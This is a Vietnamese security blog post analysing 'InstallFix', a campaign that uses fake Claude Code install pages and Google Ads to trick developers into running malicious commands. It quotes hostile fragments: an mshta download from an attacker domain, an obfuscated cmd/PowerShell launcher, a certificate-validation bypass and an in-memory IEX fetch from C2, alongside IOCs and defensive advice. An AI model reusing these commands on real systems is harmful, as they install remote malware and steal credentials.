# Bạn đang cài AI tool… hay tự tay mở cửa cho hacker?

## Tóm tắt chiến dịch

**InstallFix** là chiến dịch malware/social engineering được phát hiện trong đầu năm 2026, nhắm trực tiếp vào cộng đồng developer và AI engineer thông qua việc giả mạo trình cài đặt của Claude Code — một AI coding tool phổ biến.

Khác với các chiến dịch phishing truyền thống sử dụng email hoặc attachment độc hại, InstallFix tận dụng: **Google Ads, SEO poisoning, Fake installer websites, One-line terminal commands** để dụ nạn nhân tự thực thi malware trên máy của mình.

Chiến dịch được đánh giá nguy hiểm bởi tỷ lệ thành công cao, gần như không cần exploit kỹ thuật và đặc biệt nhắm vào nhóm người dùng có đặc quyền cao (developer/devops).

## **Vì sao AI tool đang trở thành mục tiêu hấp dẫn cho attacker?**

## Timeline sự kiện

| Thời gian | Sự kiện |
| --- | --- |
| Q1/2026 | Attacker dựng fake website giả mạo Claude Code và mua Google Ads để đẩy kết quả tìm kiếm độc hại lên đầu. |
| T0 | Người dùng tìm kiếm “Claude Code install” và truy cập nhầm website giả mạo. |
| T0 + vài phút | Nạn nhân copy-paste lệnh cài đặt độc hại vào terminal/PowerShell. |
| T0 + 1 phút | Payload stage-1 được thực thi, tải thêm malware thông qua PowerShell hoặc `mshta.exe`. |
| T0 + 5 phút | Malware tạo persistence và bắt đầu đánh cắp GitHub token, SSH key, browser cookies và cloud credentials. |
| T0 + 10 phút | Thiết bị kết nối tới C2 server để nhận thêm payload và lệnh điều khiển. |
| T0 + vài giờ | Researcher phát hiện hạ tầng giả mạo và hành vi malware bất thường. |

## **Lây nhiễm ban đầu**

Chiến dịch InstallFix được phát tán chủ yếu thông qua Google Ads bằng cách lợi dụng các kết quả tìm kiếm được tài trợ (Sponsored Results). Khi người dùng tìm kiếm các từ khóa như “Claude Code” hoặc “Claude Code install”, website giả mạo sẽ xuất hiện ngay ở vị trí đầu tiên trên Google Search, khiến nhiều nạn nhân tin rằng đây là trang chính thức.

![](https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/dcec1cdc-f249-46da-baa2-2fc2b0df9016.png align="center")

![](https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/03050384-2ade-4e4d-954f-2b5461b20bf6.png align="center")

Trang giả mạo này được thiết kế rất tinh vi, mô phỏng gần như toàn bộ giao diện và workflow cài đặt của website thật. Điểm nguy hiểm nhất nằm ở phần install command được hiển thị trên trang. Thay vì lệnh cài đặt hợp lệ, attacker đã thay thế bằng command độc hại sử dụng PowerShell và `mshta.exe` nhằm tải và thực thi malware trên hệ thống Windows. Với người dùng macOS, website cũng hiển thị các command độc hại tương tự nhằm triển khai payload trên thiết bị Apple.

![](https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/0a1d9b66-0c42-4670-ac9d-056f01ee3516.png align="center")

Ngoài ra, URL quảng cáo độc hại còn được thiết kế để trông giống liên kết hợp pháp của Google Ads. Các tham số như `gar_source` và `gad_campaign` được thêm vào nhằm mô phỏng cấu trúc tracking thường thấy trong các chiến dịch quảng cáo Google, giúp tăng độ tin cậy và giảm khả năng bị nghi ngờ bởi người dùng.

![](https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/ebdfe512-b65f-430c-9e1c-c30b806b2819.png align="center")

## Chuỗi tấn công

![](https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/05ea378b-6821-4c24-8b01-9cd620ddec90.png align="center")

**Giai đoạn 1 — Initial Access qua Google Ads Malvertising**

Chiến dịch InstallFix bắt đầu bằng việc attacker mua quảng cáo Google Ads để chiếm vị trí đầu trong kết quả tìm kiếm với các từ khóa như “Claude Code” hoặc “Claude Code install”. Khi người dùng tìm kiếm công cụ AI này, kết quả được tài trợ (Sponsored Result) sẽ dẫn tới một website giả mạo có giao diện gần như giống hoàn toàn trang cài đặt chính thức của Claude Code.

Website giả được thiết kế rất tinh vi với hướng dẫn cài đặt riêng cho từng hệ điều hành như Windows và macOS. Thay vì cung cấp file cài đặt hợp pháp, trang web hiển thị một command độc hại và yêu cầu người dùng copy-paste vào terminal hoặc PowerShell để “hoàn tất cài đặt”.

Đây là biến thể của kỹ thuật ClickFix social engineering — attacker không khai thác lỗ hổng kỹ thuật mà khiến nạn nhân tự thực thi payload trên máy của mình. Trên Windows, command này sẽ kích hoạt `mshta.exe` để tải payload từ remote server.

**Giai đoạn 2 — MSHTA tải và thực thi file Polyglot ZIP/HTA**

Sau khi người dùng chạy command từ website giả, tiến trình PowerShell sẽ gọi: `mshta.exe https://download-version.1-5-8[.]com/claude.msixbundle` và Payload được tải về có `claude.msixbundle`.

![](https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/c0ddbb35-caf5-4d1f-b6aa-6377e40e843d.png align="center")

Bề ngoài đây giống một package cài đặt Microsoft hợp lệ, tuy nhiên thực tế file này là một ZIP/HTA polyglot — nghĩa là một file chứa đồng thời: archive ZIP hợp lệ và một HTA payload độc hại được append ở cuối file.

Phần đầu của file chứa các package Microsoft Bing có chữ ký số hợp lệ từ Microsoft Marketplace nhằm tăng độ tin cậy nếu bị kiểm tra sơ bộ. Tuy nhiên, `mshta.exe` sẽ bỏ qua phần ZIP và trực tiếp đọc phần HTA được nhúng ở cuối file để thực thi mã độc.

Kỹ thuật polyglot này giúp attacker:

*   Bypass kiểm tra đơn giản
    
*   Khiến file trông hợp pháp
    
*   Né một số cơ chế detection dựa trên extension hoặc magic bytes
    

![](https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/b221f89e-6c28-49fd-87a8-71857ac66096.png align="center")

**Giai đoạn 3 — HTA VBScript thực thi âm thầm thông qua COM**

Sau khi `mshta.exe` chạy payload, phần HTA sẽ kích hoạt VBScript bên trong một cách hoàn toàn ẩn khỏi người dùng. Script sử dụng: `Shell.Application` thông qua COM object: `GUID: 9BA05972-F51F-4DE8-95A4-F561CC55EBC4` để launch payload tiếp theo.

Để né detection, attacker sử dụng nhiều lớp obfuscation:

*   Hex encoding
    
*   Base64 encoding
    
*   Split string reconstruction
    

Hai function chính được dùng:

*   `DisplayEmailGnu()` để giải mã chuỗi hex
    
*   `GetBiosDebian()` để giải mã Base64 command
    

Sau khi decode hoàn tất, VBScript sẽ thực thi command: `cmd.exe /v:on /c "set x=pow&&set y=ershell&&call %windir%\SysWOW64\WindowsPowerShell\v1.0!x!!y! -E "` nhằm gọi Windows PowerShell từ `cmd.exe` để thực hiện cho chuỗi tấn công tiếp theo.

**Giai đoạn 4 — PowerShell Stager và AMSI Bypass**

Sau khi command được reconstruct, malware gọi phiên bản PowerShell 32-bit trong: `SysWOW64\WindowsPowerShell\v1.0\` và thực thi payload Base64 thông qua tham số: `-E`. PowerShell stager này thực hiện nhiều bước quan trọng:

**Victim Fingerprinting**

*   Tại đây Malware tạo ID riêng cho từng nạn nhân bằng cách hash: **COMPUTERNAME + USERNAME,** sử dụng MD5 rồi lấy 16 ký tự đầu tiên làm victim token.
    
*   Điều này cho phép attacker:
    
    *   tracking từng nạn nhân riêng biệt
        
    *   tạo URL C2 unique cho mỗi máy
        
    *   khó block ở mức network
        

**SSL Validation Bypass**

*   Malware vô hiệu hóa certificate validation: `[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}` để chấp nhận mọi HTTPS certificate kể cả self-signed hoặc malicious cert.
    

**AMSI Bypass**

*   Một trong những kỹ thuật nguy hiểm nhất là patch AMSI (Antimalware Scan Interface). Payload:
    
    *   RC4 decrypt các chuỗi obfuscation
        
    *   sử dụng key:
        
*   Kết quả:
    
    *   PowerShell session gần như “mù” với AMSI
        
    *   AV/EDR khó scan các payload tiếp theo
        

**Fileless Payload Execution**

*   Sau khi bypass AMSI thành công, malware tải stage cuối từ C2: `https://[victim-id].oakenfjrod[.]ru/cloude-91267b64-989f-49b4-89b4-984e0154d4d1`
    

![](https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/4d4ec9af-6461-49eb-a179-075b860036dd.png align="center")

*   Payload được thực thi trực tiếp trong memory bằng: `IEX` mà không cần ghi file xuống disk. Đây là kỹ thuật fileless execution rất phổ biến trong malware hiện đại nhằm:
    
    *   Né antivirus
        
    *   Giảm forensic artifacts
        
    *   Khó phân tích hơn
        

**Giai đoạn 5 — Final Payload**

Payload cuối cùng chưa được recovery hoàn chỉnh do Trend Micro Apex One đã terminate chuỗi tiến trình ở giai đoạn trước khi `IEX` hoàn tất.

Tuy nhiên, telemetry cho thấy malware đã cố tải payload từ: `https://[victim-id].oakenfjrod[.]ru/`

![](https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/cc7ab78d-3171-400e-9525-9fffc84b47c4.png align="center")

Do payload được thực thi fileless và bị chặn sớm, chức năng cuối cùng chưa được xác định hoàn toàn. Tuy nhiên dựa trên TTPs và hành vi observed, nhiều khả năng đây là:

*   infostealer
    
*   remote access payload
    
*   credential harvester
    
*   secondary loader cho malware khác.
    

## InstallFix là sự tiến hóa của ClickFix

Nhiều researcher xem InstallFix là phiên bản mới của kỹ thuật: **ClickFix**

Khác biệt nằm ở chỗ:

*   ClickFix lừa user click
    
*   InstallFix lừa user tự chạy command
    

Tâm lý “tự tay chạy lệnh” khiến:

*   nạn nhân ít nghi ngờ hơn
    
*   nhiều security policy bị bypass tự nhiên
    

## IOC

**Domains**

*   download-version\[.\]1-5-8\[.\]com
    
*   hosted-by\[.\]yeezyhost\[.\]net
    
*   oakenfjrod\[.\]ru
    

**URL**

*   hxxps://download-version\[.\]1-5-8\[.\]com/claude\[.\]msixbundle
    
*   hxxps://<victim\_md5>.oakenfjrod\[.\]ru/cloude-91267b64-989f-49b4-89b4-984e0154d4d1
    

**IP**

*   185\[.\]177\[.\]239\[.\]255
    
*   77\[.\]91\[.\]97\[.\]244
    
*   104\[.\]21\[.\]0\[.\]95
    

**Hashes**

*   2b99ade9224add2ce86eb836dcf70040315f6dc95e772ea98f24a30cdf4fdb97
    
*   ec1206989449d30746b5ceb2b297cda9f3f09636a0e122ecafb40b1dc2e86772
    
*   2f04ba77bb841111036b979fc0dab7fcbae99749718ae1dd6fd348d4495b5f74
    

## MITRE ATT&CK Mapping

| Tactic | Technique | Description |
| --- | --- | --- |
| Initial Access | T1566 | Phishing |
| Execution | T1059.001 | PowerShell |
| Defense Evasion | T1218 | Signed Binary Proxy Execution |
| Persistence | T1547 | Startup Persistence |
| Credential Access | T1555 | Browser Credentials |
| Discovery | T1082 | System Information Discovery |
| Command & Control | T1071.001 | Web Protocols |
| Exfiltration | T1041 | Exfiltration Over C2 |

## Nhận định chuyên gia

InstallFix cho thấy attacker hiện nay không còn phụ thuộc hoàn toàn vào exploit kỹ thuật mà chuyển sang khai thác trực tiếp hành vi người dùng. Thay vì phát tán malware qua email phishing truyền thống, chiến dịch này lợi dụng thói quen copy-paste lệnh cài đặt của developer để đạt initial access.

Điểm đáng chú ý là mục tiêu không phải người dùng phổ thông mà là developer và AI engineer — những người thường sở hữu GitHub token, SSH key, cloud credentials và quyền truy cập hạ tầng quan trọng. Điều này khiến một compromise nhỏ hoàn toàn có thể leo thang thành supply-chain attack quy mô lớn.

Chiến dịch cũng phản ánh xu hướng mới khi AI ecosystem đang dần trở thành attack surface hấp dẫn cho cybercriminals. Với sự phổ biến của AI coding tools, các chiến dịch giả mạo installer, package hoặc extension nhiều khả năng sẽ còn gia tăng trong thời gian tới.

Đối với doanh nghiệp tại Việt Nam, nguy cơ đặc biệt cao ở các công ty công nghệ, outsourcing, fintech và AI startup — nơi developer thường sử dụng local admin workstation và cloud credential trên máy cá nhân. InstallFix là lời cảnh báo rõ ràng rằng bảo mật cho AI tooling giờ đây đã trở thành yêu cầu bắt buộc, không còn là lựa chọn.

## Khuyến nghị

**Không cài phần mềm từ Google Ads**

Nhiều nạn nhân bị lừa vì click vào kết quả “Sponsored” trên Google Search. Attacker chỉ cần mua quảng cáo và clone giao diện website chính thức là có thể đánh lừa người dùng.

Thay vì tìm kiếm ngẫu nhiên:

*   hãy bookmark website chính thức
    
*   truy cập trực tiếp từ vendor
    
*   verify kỹ domain trước khi tải
    

**Hạn chế tối đa việc dùng** `curl | bash`

*   tải script về trước
    
*   đọc nội dung script
    
*   kiểm tra domain và checksum
    
*   ưu tiên package manager chính thức như:
    
    *   Homebrew
        
    *   apt
        
    *   winget
        
    *   npm registry verified
        

**Không chạy terminal bằng quyền Administrator/root nếu không cần**

Nhiều malware chỉ hoạt động nguy hiểm khi user chạy terminal với quyền cao.

Hạn chế:

*   dùng `sudo` mặc định
    
*   mở PowerShell Administrator thường xuyên
    
*   cấp quyền root cho tool không rõ nguồn gốc
    

**Bảo vệ credential developer**

*   dùng MFA cho tất cả tài khoản
    
*   rotate token định kỳ
    
*   không lưu secret plaintext
    
*   dùng password manager
    
*   ưu tiên hardware security key (YubiKey/FIDO2)
    

**Tách môi trường development và tài khoản cá nhân**

Không nên:

*   dùng cùng browser cho công việc và cá nhân
    
*   lưu cloud credential trên máy cá nhân không được hardening
    
*   develop trực tiếp trên máy có dữ liệu quan trọng
    

Nên:

*   dùng VM/dev container
    
*   dùng browser profile riêng
    
*   sandbox AI tools chưa tin cậy
    

**Cập nhật nhận thức về AI-related threats**

AI ecosystem đang trở thành mục tiêu mới của attacker. Trong thời gian tới, các chiến dịch tương tự nhiều khả năng sẽ mở rộng sang:

*   AI IDE plugins
    
*   MCP servers
    
*   AI agents
    
*   VSCode extensions
    
*   fake npm/pypi packages
    

## Tham khảo

[InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise | Trend Micro (US)](https://www.trendmicro.com/en_us/research/26/e/installfix-and-claude-code.html)

[InstallFix Uses Fake Claude Pages for Fileless Attacks](https://socprime.com/active-threats/installfix-uses-fake-claude-pages/)
